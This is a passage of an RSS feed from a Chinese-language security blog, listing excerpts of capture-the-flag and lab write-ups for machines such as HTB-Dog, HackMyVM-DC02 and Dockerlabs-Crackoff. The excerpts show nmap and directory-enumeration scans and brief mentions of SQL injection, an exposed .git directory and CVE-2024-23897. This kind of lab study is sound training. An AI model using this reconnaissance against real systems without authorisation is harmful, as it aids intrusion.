      <pubDate>Sun, 09 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-newbee/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/debian  
❯ nmap 192.168.237.155 -sV -A -p- -T4

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 92:6e:6d:b0:bd:08:1e:db:9d:56:0e:f8:15:25:ca:21 (ECDSA)
|_  256 88:d7:08:bd:a2:95:75:cc:71:06:47:ae:fd:d3:8b:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: PHPJabbers.com | Free Food Store Website Template
MAC Address: 00:0C:29:0A:FF:81 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;paramscan&#34;&gt;ParamScan&lt;/h2&gt;
&lt;p&gt;访问&lt;strong&gt;80&lt;/strong&gt;端口，在网页注释中发现存在&lt;strong&gt;GET&lt;/strong&gt;参数&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Dog</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-dog/</link>
      <pubDate>Sun, 09 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-dog/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Dog  
❯ nmap dog.htb -sV -A -Pn -T4        

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file &amp;#39;description&amp;#39; to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;可以发现&lt;strong&gt;nmap&lt;/strong&gt;直接扫描到了**/.git**目录&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVm-easypwn</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-easypwn/</link>
      <pubDate>Fri, 07 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-easypwn/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.105 -sV -A -Pn -T4 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 14:36 CST
Nmap scan report for 192.168.56.105
Host is up (0.00024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Don&amp;#39;t Hack Me
|_http-server-header: Apache/2.4.59 (Debian)
6666/tcp open  irc?
| fingerprint-strings: 
|   Help, Socks4, Socks5: 
|     Hackers, get out of my machine
|   beast2: 
|_    start: 11
|_irc-info: Unable to open connection
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;6666&lt;/strong&gt;端口只能用&lt;strong&gt;nc&lt;/strong&gt;连接，进入&lt;strong&gt;80&lt;/strong&gt;端口发现需要扫描目录&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Ephermeral2</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnvm-ephermeral2/</link>
      <pubDate>Fri, 07 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnvm-ephermeral2/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Ephemeral2  
❯ nmap 192.168.56.107 -sV -A -p- 

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:cc:f1:53:7e:6b:31:2c:10:1e:6d:bc:01:b1:c3:a2 (RSA)
|   256 cd:19:04:a0:d1:8a:8b:3d:3e:17:ee:21:5d:cd:6e:49 (ECDSA)
|_  256 e5:6a:27:39:ed:a8:c9:03:46:f2:a5:8c:87:85:44:9e (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:47:B9:0F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: EPHEMERAL, NetBIOS user: &amp;lt;unknown&amp;gt;, NetBIOS MAC: &amp;lt;unknown&amp;gt; (unknown)
| smb2-time: 
|   date: 2025-03-07T16:30:22
|_  start_date: N/A
|_clock-skew: 7h59m57s
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Ephemeral2  
❯ gobuster dir -u http://192.168.56.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50                                                                                                ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--&amp;gt; http://192.168.56.107/javascript/]
/server-status        (Status: 403) [Size: 279]
/foodservice          (Status: 301) [Size: 322] [--&amp;gt; http://192.168.56.107/foodservice/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;存在一个**/foodservice**页面&lt;/p&gt;</description>
    </item>
    <item>
      <title>VulnVM-Backend</title>
      <link>https://www.hyhforever.top/posts/2025/03/vulnvm-backend/</link>
      <pubDate>Wed, 05 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/vulnvm-backend/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Backend  
❯ nmap 192.168.237.148 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ec:8d:c2:a6:1e:52:43:62:44:29:36:58:73:15:6b (RSA)
|   256 0d:39:f5:86:a1:fc:7d:ba:c6:55:14:37:2c:91:fe:37 (ECDSA)
|_  256 d6:91:b0:62:48:85:9c:51:dd:f9:20:35:d2:53:a6:25 (ED25519)
8080/tcp open  http    Jetty 10.0.18
|_http-title: Site doesn&amp;#39;t have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(10.0.18)
MAC Address: 00:0C:29:42:20:88 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;cve-2024-23897&#34;&gt;CVE-2024-23897&lt;/h2&gt;
&lt;p&gt;进入&lt;strong&gt;8080&lt;/strong&gt;端口发现是一个&lt;strong&gt;Jenkins&lt;/strong&gt;的登录页面&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-predictable</title>
      <link>https://www.hyhforever.top/posts/2025/03/dockerlabs-predictable/</link>
      <pubDate>Tue, 04 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/dockerlabs-predictable/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;p&gt;不知道为什么扫得很慢，这里就简略一点&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/predictable  
❯ nmap 172.17.0.2 -p- 

PORT     STATE SERVICE
22/tcp   open  ssh
1111/tcp open  lmsocialserver
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;crack-number&#34;&gt;Crack Number&lt;/h2&gt;
&lt;p&gt;访问&lt;strong&gt;1111&lt;/strong&gt;端口，在源代码中得到信息&lt;/p&gt;
&lt;p&gt;似乎是这个随机数列表的生成逻辑&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVm-DC02</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-dc02/</link>
      <pubDate>Mon, 03 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-dc02/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali  
❯ nmap 192.168.56.126 -sV -Pn -T4  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 18:44 CST
Nmap scan report for 192.168.56.126
Host is up (0.00028s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-02 23:47:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:4E:CF:21 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;把&lt;strong&gt;SOUPEDECODE.LOCAL&lt;/strong&gt;、&lt;strong&gt;DC01.SOUPEDECODE.LOCAL&lt;/strong&gt;添加到**/etc/hosts**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Cypher</title>
      <link>https://www.hyhforever.top/posts/2025/03/htb-cypher/</link>
      <pubDate>Sun, 02 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/htb-cypher/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Cypher  
❯ nmap cypher.htb -sV -A -T4 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: GRAPH ASM
|_http-server-header: nginx/1.24.0 (Ubuntu)
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;dirsearch&#34;&gt;Dirsearch&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Desktop  
❯ dirsearch -u cypher.htb -t 50 -x 404

Target: http://cypher.htb/

Starting:                                                                                                                                        
200 - 5KB - /about                                            
200 - 5KB - /about.html                                       
307 - 0B  - /api  -&amp;gt;  /api/docs                               
307 - 0B  - /api/  -&amp;gt;  http://cypher.htb/api/api              
307 - 0B  - /demo/  -&amp;gt;  http://cypher.htb/api/demo            
307 - 0B  - /demo  -&amp;gt;  /login                                 
200 - 4KB - /login.html                                       
200 - 4KB - /login                                            
301 - 178B  - /testing  -&amp;gt;  http://cypher.htb/testing/          
                                                                             
Task Completed      
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/03/htb-cypher/images/image-34.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/03/htb-cypher/images/image-34.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Crackoff</title>
      <link>https://www.hyhforever.top/posts/2025/03/dockerlabs-crackoff/</link>
      <pubDate>Sat, 01 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/dockerlabs-crackoff/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/crackoff  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 21:28 CST
Nmap scan report for sitio.dl (172.17.0.2)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3d:fc:bd:41:cb:81:e8:cd:a2:58:5a:78:68:2b:a3:04 (ECDSA)
|_  256 d8:5a:63:27:60:35:20:30:a9:ec:25:36:9e:50:06:8d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CrackOff - Bienvenido
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.10 ms sitio.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/crackoff  
❯ gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 2974]
/login.php            (Status: 200) [Size: 3968]
/welcome.php          (Status: 200) [Size: 2800]
/db.php               (Status: 302) [Size: 75] [--&amp;gt; error.php]
/error.php            (Status: 200) [Size: 2705]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;sql-injection&#34;&gt;SQL Injection&lt;/h2&gt;
&lt;p&gt;进入&lt;strong&gt;login.php&lt;/strong&gt;，发现在&lt;strong&gt;username&lt;/strong&gt;字段中存在&lt;strong&gt;SQL&lt;/strong&gt;注入漏洞，单引号闭合&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-r00tless</title>
      <link>https://www.hyhforever.top/posts/2025/03/dockerlabs-r00tless/</link>
      <pubDate>Sat, 01 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/dockerlabs-r00tless/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Hard&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/r00tless  
❯ nmap 172.18.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 11:27 CST
Nmap scan report for 172.18.0.2
Host is up (0.000092s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 fa:7b:d3:96:f6:83:bb:bd:24:86:b4:a8:f6:59:c3:62 (ECDSA)
|_  256 29:49:38:ae:44:75:d8:88:2a:b6:98:55:00:bd:24:76 (ED25519)
80/tcp  open  http        Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Subir Archivo
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:12:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-01T03:27:48
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.18.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.77 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;gobuster&#34;&gt;Gobuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/r00tless  
❯ gobuster dir -u http://172.18.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.18.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 2410]
/.php                 (Status: 403) [Size: 275]
/upload.php           (Status: 200) [Size: 56]
/readme.txt           (Status: 200) [Size: 78]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-passsamba&#34;&gt;Own &lt;strong&gt;passsamba&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/03/dockerlabs-r00tless/images/image-8.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/03/dockerlabs-r00tless/images/image-8.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-DC03</title>
      <link>https://www.hyhforever.top/posts/2025/03/hackmyvm-dc03/</link>
      <pubDate>Sat, 01 Mar 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/03/hackmyvm-dc03/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Windows&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/Desktop  
❯ nmap 192.168.56.103 -sSV -Pn -A -T4

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-02 03:01:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:46:72:D1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
